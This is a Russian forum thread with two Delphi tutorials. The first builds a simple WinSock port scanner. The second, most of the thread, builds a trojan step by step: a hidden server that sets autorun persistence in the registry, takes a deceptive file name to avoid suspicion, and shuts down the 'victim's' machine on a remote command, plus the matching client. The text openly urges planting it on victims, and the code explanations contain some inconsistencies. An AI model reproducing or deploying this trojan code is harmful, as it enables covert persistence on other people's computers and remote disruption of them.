Добро пожаловать на форум www.undo.spybb.ru. Думаем вам тут понравится и вы останетесь и буду посещать этот ресурс всегда с уважением Lager и rp.ob

На форуме есть всё,что ищите!Смотрите добавляйте, удачи(Администратор - Lager)

Объявление

На этом форуме всегда много нового, так что лазейте добавляйте,ищите,(Удачи)

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Delphi -> Программа для скана портов

Страница: 1

Сообщений 1 страница 2 из 2

1

  • Автор: Lager
  • Админ
  • Lager
  • Откуда: Питер
  • Зарегистрирован: 2007-10-10
  • Приглашений: 0
  • Сообщений: 443
  • Уважение: +0
  • Позитив: +0
  • Пол: Мужской
  • Возраст: 33 [1991-04-16]
  • Провел на форуме:
    1 день 11 часов
  • Последний визит:
    2008-04-09 21:01:54

Давайте рассмотрим основные функции winsock. Для того, чтобы написать сканер
(или другое сетевое приложение) нам понадобиться Socket.

Функции :

1. WSAStartUp(wVersionRequired : Word, var WSAData : TWSAData);

1. Для того, чтобы начать работать с winsock его нужно сначала стартовать. Как
раз эта функция предназначена для этого. В качестве первого параметра ей нужно
передать версию, второй параметр - это переменная, которая возвратит мне
информацию о winsock.

2. WSACleanUp(Sock : TSocket);

2. Функция для уничтожения из памяти PC winsock. В качестве параметра ей нужно
передать сокет.

3. socket(af : Integer, type : Integer, protocol : Integer);

3. Функция для создания сокета. В первый параметр нужно передать функцию
подключения (AF_INET, PF_INET), второй параметр - тип подключения, и третий
параметр - это протокол подключения (для TCP - это SOCK_STREAM, a для UDP - это
SOCK_DGRAM).

4. connect(s : Cardinal, name : PSockAddr, namelen : Integer);

4. Собствено функция для подключения. В качестве первого параметра нужно
передать переменную-сокет, второй параметр - это запись типа TSockAddr, и третий
параметр - это размер записи, для нахождения размера воспользуйтесь функцией
SizeOf().

5. closesocket(s : Cardinal);

5. Функция для закрытия сокета. В качестве первого параметра нужно передать
сокет-переменную. Итак. Все. Хватит теории. Давайте приступим к боевым действиям.

Вот исходный текст сканера. Перепешите его, а я пока растолкую в чем тут
собственно дело.

program Scanner;

{$APPTYPE CONSOLE}

uses

SysUtils, WinSock2;

var

D: TWSAData;
S : TSocket;
A : TSockAddr;
ports : Integer;
PName : String;
tec : PServEnt;
begin
writeln('Port Scanner by Dark Eagle');
writeln;
if paramcount < 1 then
begin
writeln('Usage : '+paramstr(0)+' 127.0.0.1 1 1024');
exit;
end;
if WSAStartup(MAKEWORD(2,0), D) <> 0 then
begin
writeln('Error');
exit;
end;
A.sin_family := AF_INET;
A.sin_addr.S_addr := inet_addr(pchar(paramstr(1)));
S := socket(AF_INET, SOCK_STREAM,0);
if S = INVALID_SOCKET then
begin
writeln('Invalid socket');
exit;
end;
for ports := StrToInt(paramstr(2)) to StrToInt(paramstr(3)) do
begin
A.sin_port := htons(ports);
tec := getservbyport(htons(ports), 'TCP');
if tec = nil then
PName := 'Unknown'
else
begin
PName := tec.s_name;
end;
if connect(S,@A,sizeof(A))=0 then
writeln(IntToStr(ports)+' '+ PName +' open')
else
writeln(IntToStr(ports)+' '+ PName +' close');
end;
WSACleanup;
closesocket(S);
writeln;
writeln('Scan complete');
end.

Итак в разделе uses я подключаю библиотеку winsock2. Далее идут объявления
переменных. Первая переменная - это, собственно, переменная для инициализации
winsock. Вторая переменная - это переменная-сокет. Она нам нужна для создания
сокета. Третяя переменная - это переменная с адресом сокета. Она хранит в себе
адрес сервера, на который поступает соединение. Четвёртая переменная - это
переменная типа целое число. Она нужна нам для запуска цикла сканирования
портов. Пятая переменная - это переменная с хранением списка портов разных
сервисов. Шестая переменная - это переменная winsock, она хранит в себе все
записи о сканируемых сервисах.

Далее идет сам текст программы.

В первой строке кода идет вывод информации об авторе, с помощью стандартной
функции writeln. Writeln без параметров это переход на новую строку. Далее идет
проверка, если сканер запущен без параметров, то выводим о правильном
использовании сканера.

Потом идет проверка о правильности запуска winsock с помощью описаной раньше
функции WSAStartUp. Запускаем вторую версию Winsock, если же произошли ошибки то
выводим сообщение об ошибке.

Далее идет присваивание параметров. Переменная для создания соединения с
сокетом. Ей присваевается тип соединения с помощью записи:

A.sin_family := AF_INET;

Эта запись говорит о типе (в нашем случае это асинхроно, т.е. блокировка).
Асинхроное соединение - это соединение, когда программа забрасывает соединениями
сервер, а не ждет каждого ответа. Есть и другой способ соединения - это PF_INET,
он наоборот ждет каждый ответ от сервера, что не так уж хорошо.

Далее идет функция преобразования адреса сервера в спец. формат, с помощью
функции inet_addr. В качестве параметра ей нужно передать адрес сервера, что я и
делаю.

Потом идет создание сокета. Функцию для этого я описал ранее. Последний параметр
можно проигнорировать.

Потом сравнивается сокет, если сокет равен INVALID_SOCKET, тогда выводим
сообщение об ошибке. Далее запускается цикл сканирования портов, с помощью
циклов for..to..do. Потом присваевается записи адреса сокета порт. Он
переводиться в спец. формат с помощью функции htons(). Эта функция обязательна
для преобразования портов.

Далее я присваиваю переменной tec названия повтор протокола TCP с помощью
функции getservbyport(). Потом я проверяю, если переменная tec равна нулю, то
записываю в переменную PName, что порт неизвестен программе, в противном случае
в переменную PName заносится название порта протокола TCP. Потом опять идет
проверка, и если соединение удалось, то выводим сообщение, что порт открыт и
название сервиса, в противном случае выводим сообщение, что порт закрыт.

Потом очищаем из памяти PC winsock и закрываем сокет.

Вот и все. Конечно сканер будет довольно медлительным, но это можно исправить
есди добавить к сканеру несколько процессов, так сканер станет быстрым.

0

2

  • Автор: Lager
  • Админ
  • Lager
  • Откуда: Питер
  • Зарегистрирован: 2007-10-10
  • Приглашений: 0
  • Сообщений: 443
  • Уважение: +0
  • Позитив: +0
  • Пол: Мужской
  • Возраст: 33 [1991-04-16]
  • Провел на форуме:
    1 день 11 часов
  • Последний визит:
    2008-04-09 21:01:54

Delphi -> Написание Трояна

Боевой конь за 10 минут:
Ты уже сто раз слышал это магическое слово «Троян». И мы уже много раз писали обзоры различных коней этой породы. В твоих извилинах, наверно уже давно крутиться мысль о создании собственного боевого коня. Сегодня тебе предстоит эта уникальная возможность. Даже если ты никогда не будешь использовать эти знания, тебе всё равно нужно знать, как работают трояны изнутри.

Для простоты тела мы сделаем это на Delphi. Я выбрал этот язык, потому что тело журнала ограничено, и я не хочу вдаваться в подробности протоколов.

В этом номере ты найдёшь статью, посвящённую написанию супер плеера на Delphi. Если ты её пропустил, то обязательно прочти и возвращайся сюда. Там я описал основные принципы работы с оболочкой компилятора, так что здесь повторяться не буду.

Приготовься, нам предстоит написать сразу две проги. Одна будет находиться на твоей машине (клиент), другую надо будет подбросить жертве (сервер). Работы будет много, поэтому меньше слов, и ближе к телу.

Троянский сервер:
Итак, запускай Delphi или если он у тебя уже запущен, то создавай новый проект («File» – «New Application»). Сейчас мы примемся за серверную часть трояна.

Для начала выбери пункт меню «Options» из меню «Project».
Здесь ты должен перенести «From1» из раздела «Auto-Create forms» (список слева) в «Available forms» (список справа), как это сделано у меня. Только что мы отключили From1 из списка авто инициализируемых форм. Теперь инициализацию придётся произвести вручную. Не пугайся, это очень просто.

На странице «Application» этого же диалога есть кнопка «Load Icon». Нажми её, чтобы сменить иконку будущей проги. Если икону не сменить, то будет использоваться дельфячая, а она быстро выдаст твоё смертельное оружие.

Теперь ты должен бросить на форму компонент ServerSocket из раздела «Internet», это сервак протокола (по умолчанию TCP, и нам его достаточно). Выдели созданный ServerSocket1 и перейди в ObjectInspector. Здесь тебя интересует только свойство «Port». По умолчанию оно равно 1024, но я тебе советую его поменять на любое другое (желательно больше 1000).

Теперь щёлкни в любом месте на форме, чтобы активизировать её свойства. Перейди в ObjectInspector и щёлкни по закладке Events. Дважды щёлкни по строке «OnCreate» и Delphi, как всегда, создаст процедуру, она будет выполняться при инициализации формы. Напиши там следующее:

procedure TForm1.FormCreate(Sender: TObject);
var RegIni:TRegIniFile;
begin
RegIni:=TRegIniFile.Create('Software');
RegIni.RootKey:=HKEY_LOCAL_MACHINE;
RegIni.OpenKey('Software', true);
RegIni.OpenKey('Microsoft', true);
RegIni.OpenKey('Windows', true);
RegIni.OpenKey('CurrentVersion', true);
RegIni.WriteString('RunServices', 'Internat32.exe',
   Application.ExeName);
RegIni.Free;
ServerSocket1.Active:=true;
end;

Теперь перейди в начало текста и напиши после «uses» слово «registry». Мы уже делали такую операцию в статье про мега плеер, но я повторю, как это будет выглядеть:

uses registry, Windows, Messages,

Теперь я объясню, что мы написали в процедуре.

«var RegIni:TRegIniFile» - здесь мы объявили переменную RegIni типа TRegIniFile. С помощью этой переменной мы будем общаться с реестром.

«RegIni:=TRegIniFile.Create('Software')» - инициализируем переменную указывающую на реестр.

«RegIni.RootKey:=HKEY_LOCAL_MACHINE» говорим, что нас интересует раздел HKEY_CURRENT_USER реестра.

«RegIni.OpenKey('Software', true)» - открываю подраздел «Software».

Дальше я последовательно открываю подразделы, пробираясь в недра окошек.

«RegIni.WriteString('RunServices', 'Internat32.exe', Application.ExeName)” – записываю в раздел «RunServices» (в этом разделе хранятся проги, которые автоматически загружаются при старте), новый параметр с именем «Internat32.exe» (имя будущего файла) и значением Application.ExeName (здесь храниться полный путь к запущенному трояну).

«RegIni.Free» - уничтожаю ненужный больше объект RegIni.

Всё это делалось, чтобы при запуске проги, она сама себя прописывала в разделе автозапуска. И после перезагрузки компьютера она автоматически загружалась в память.

Самая последняя строка «ServerSocket1.Active:=true» запускает сервер на указанном тобой порте.

С загрузкой покончено. Теперь давай займёмся выгрузкой. Опять выдели форму и в закладке Events у ObjectInspector-а дважды щёлкни по строке «OnDistroy». Теперь создастся процедура, которая будет выполняться при уничтожении формы. В созданной процедуре напиши:

procedure TForm1.FormDistroy(Sender: TObject; var Action: TCloseAction);
begin
ServerSocket1.Active:=false;
end;

Этим я отключаю сервак. Если этого не сделать, то при первой же перезагрузке твоя жертва может поймать синий экран, если ты в это время будешь подключён к серверу. С одной стороны, это хорошо. Твоя жертва в очередной раз убеждается в плохой защищённости его окошек. А с другой, я не думаю, что следует выдавать себя раньше времени. Тем более, что после синего экрана перезагрузка может остановиться, а нам это не надо (забегу вперёд и скажу, что мы сами будем перегружать компьютер жертвы).

Теперь нужно выделить ServerSocket1 и перейти на закладку Events у ObjectInspector-а. Дважды щёлкни по строке «OnClientRead» и в созданной процедуре (она будет вызываться, когда что-нибудь приходит на порт) напиши:

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
  Socket: TCustomWinSocket);
begin
if Socket.ReceiveText ='R' then
ExitWindowsEx(EWX_SHUTDOWN,0);
end;

Теперь, как это звучит по-нашему:

Если полученный текст = букве ‘R’ то
  Отправить компьютер в редаун.

ExitWindowsEx – редаун заставит окна свернуться и отключить компьютер от питания. Я вообще добрый дядька, поэтому использовал параметр EWX_SHUTDOWN. С этим параметром, перед редауном всем запущенным приложениям полетит запрос о выключении, и жертва сможет сохранить свои изменённые данные. Если ты злей меня, то используй EWX_FORCE. В этом случае, компьютер упадёт без предупреждения и со скоростью света, так что жертва не успеет от страха воздух испортит .

Троян практически готов, сохрани его. Для этого выбери «Save All» из меню «File». С начала Delphi запросит имя формы. Оставь по умолчанию (Unit1) и нажми «Сохранить». Потом будет запрос на имя проекта, которое будет использоваться в качестве имени ЕХЕ файла. Назови его «Internat32», чтобы файл не вызывал особых подозрений.

Конюшня для коня:
Теперь ты должен хорошенечко спрятать своего будущего скакуна, чтоб его не было видно в панели задач. Для этого выбери пункт меню «Project Manager» из меню «View».
Щёлкни правой кнопкой по Internat32.exe и в появившемся меню выбери «View Source». Перед тобой откроется маленький файл с исходным текстом проекта. Сравни то, что ты увидишь с этим текстом, и допиши то, чего не хватает, а что лишнее – убери (так не так уж и много):

program Internat32;

uses
  Forms,
  Windows.
  Unit1 in 'Unit1.pas' {Form1};

{$R *.RES}

var
WhEvent:THandle;
begin
  Application.Initialize;
  ShowWindow(Application.Handle,SW_Hide);
  Form1:=TForm1.Create(nil);
  Application.Run;

  WhEvent:=CreateEvent(nil, true,false, 'et');
  while (true) do
   begin
    WaitForSingleObject(WhEvent,1000);
    Application.ProcessMessages;
   end;
end.

Будь внимателен при переписывании. Всё должно быть один к одному. Теперь я расскажу, что здесь написано:

В самом начале нет ничего интересного, и нас абсолютно не касается. Нас интересует всё, что написано после слова «Var».

WhEvent:THandle – Этим я говорю, что мне нужен указатель WhEvent на пустое событие Thandle.

Application.Initialize – Инициализируется троян.

ShowWindow(Application.Handle, SW_Hide) – Устанавливаю параметры окна. Параметр SW_Hide – говорит, что окно должно быть невидимо. Единственное, как его можно после этого увидеть, так это нажать Ctrl+Alt+Del. Но здесь у нас используется не вызывающее подозрения (только у чайника, профи уже давно знают, о таком имени) имя.

Form1:=TForm1.Create(nil) – создаю форму. Мне приходится это делать так, потому что мы убрали форму из из списка авто создаваемых.

Application.Run – запускаю трояна. Здесь запускаются обработчики событий и прочая ерунда, за которую отвечает Delphi и которую пришлось бы писать вручную на С или С++. А здесь всё очень просто.

WhEvent:=CreateEvent(nil, true,false, 'et') – инициализация пустого события.

Следующие пять строчек я напишу словами, а ты разберёшься как всегда методом сравнения:

Пока (true) выполнять
Начать цикл
Ждать пока наступит событие (пустое событие, 1000 миллисекунд)
Получить управление
Закончить цикл

Две строчки между началом и концом цикла будет выполняться бесконечно, потому что true оно всегда true, и из этого цикла выхода нет. Весь цикл заключаеться в двух особенностях:

1. Запускается ожидание несуществующего события. Так как событие не существует, то программа прождёт его ровно указанное время в качестве второго параметра (1000 миллисекунд или 1 секунда).

2. Получить управление.

После второго шага программа снова перейдёт на пункт 1 и запустит ожидание. Во время ожидания пользователь работает с другими приложениями как всегда. Когда трояну (каждую 1 секунду) передаётся управление, то наш конь проверяет: есть ли для него сообщения. В нашем случае сообщение может быть одно – приход на указанный тобой порт управляющей команды. Если сообщения есть, то троян их выполняет. И в любом случае (есть сообщения или нет), после этого пользователь снова работает 1 секунду без проблем. Проверка происходит так быстро, что жертва не ощутит нагрузки трояна даже на четверке с сотым камнем.

Нажми «Ctrl+F9» чтобы Delphi создал .ехе файл без запуска проги. Как только Delphi перемозгует весь код, можешь считать, что серверная часть готова. Если вздумаешь её тестировать, то не забудь, что после первого же запуска троян пропишется в реестре по адресу: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices. Не забудь после тестирования его удалить.

Теперь переходим к клиентской части, которую ты должен будешь запустить на своём компьютере для управления компьютером жертвы.

Троянский всадник:
Снова сохрани все изменения и создай новый проект. Пришло время писать клиентскую часть трояна. Ещё пару минут напряжённого труда и все красавицы наши .

На новый проект ты должен бросить три компонента:

1. Button из закладки «Standart» для отправки команды на компьютер жертвы.

2. Edit из закладки «Standart» для ввода имени или адреса жертвы.

3. ClientSocket из закладки «Internet» клиент порта для связи с сервером

Посмотри на рисунок 3, у тебя должно получиться нечто похожее.

Выдели ClientSocket1 и в ObjectInspector-е измени свойство порт. По умолчанию он 0, а ты должен поставить тот, который ты назначил серверу.

Теперь дважды щёлкни по кнопке и в созданной процедуре (обработчике нажатия кнопки) напиши следующее.

procedure TForm1.Button1Click(Sender: TObject);
begin
ClientSocket1.Host:=Edit1.Text;
ClientSocket1.Active:=true;
ClientSocket1.Socket.SendText('R');
ClientSocket1.Active:=false;
end;

ClientSocket1.Host:=Edit1.Text – В ClientSocket1 заносим имя жертвы в твоей локалке. Если собираешься использовать троян в инете, то там ты имя никак не сможешь узнать. Тебе придётся использовать IP адрес, а значит эта строчка замениться на ClientSocket1.Addres:=Edit1.Text. И вводить в Edit1 ты должен будешь IP адрес.

ClientSocket1.Active:=true – активировать соединение с сервером.

ClientSocket1.Socket.SendText('R') – отправить букву R. Помнишь, что у нас было пару минут назад. Если сервер получит букву R, то он перегрузит машину.

ClientSocket1.Active:=false – закрыть соединение с сервером.

Всё. Троян готов к бою. Нажми «Ctrl+F9» чтобы Delphi создал ЕХЕ файл без запуска проги. Найди жертву и протестируй своего верного коня. Для этого нужно запустить серверную часть на компьютере жертвы. Потом запустить клиентскую часть на своём компьютере. Ввести в клиент имя компьютера жертвы (или адрес, если ты скомпилировал под использование через IP) и нажать кнопку. Компьютер жертвы должен перегрузится.

На этом я закругляюсь. Удачи тебе.

0

Страница: 1